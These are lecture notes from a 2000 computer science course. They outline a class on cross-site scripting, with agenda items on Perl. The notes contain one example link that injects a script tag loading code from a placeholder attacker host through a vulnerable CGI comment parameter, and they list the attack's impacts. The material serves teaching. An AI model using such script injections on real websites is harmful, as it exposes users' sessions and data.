Cross Site Scripting

Tom Kelliher, CS 318

Feb. 4, 2000

Administrivia

Announcements

Assignment

From Last Time

Lists & subroutines in Perl.

Outline

  1. Chapters 1--5.

  2. MinMax in Perl.

  3. Cross Site Scripting.

Coming Up

Packets.

Chapters 1--5

MinMax in Perl

Cross Site Scripting

Reference: http://www.cert.org/advisories/CA-2000-02.html

  1. Background: Browsers can execute scripts.

  2. The old, standard trojan: malicious code provided by one client for another client.

  3. The new trojan: malicious code sent by a client for itself: 
    <A HREF="www.goodguys.com/comment.cgi?mycomment=<SCRIPT 
   SRC='http://www.badguys.com/badfile'></SRC>">Link to neato stuff
   from goodguys here</A>
    This is what is meant by cross-site scripting.

  4. Abuse of other tags, such as <FORM>.

  5. Same source origin security model for scripting: pages sent by one source contain only scripts from that source.

    Violated.

  6. Impact:
    1. SSL-encrypted connections may be exposed.

    2. Attacks may be persistent through poisoned cookies.

    3. Attacker may access restricted web sites from the attacked client.


Thomas P. Kelliher
Fri Feb 4 12:59:19 EST 2000
Tom Kelliher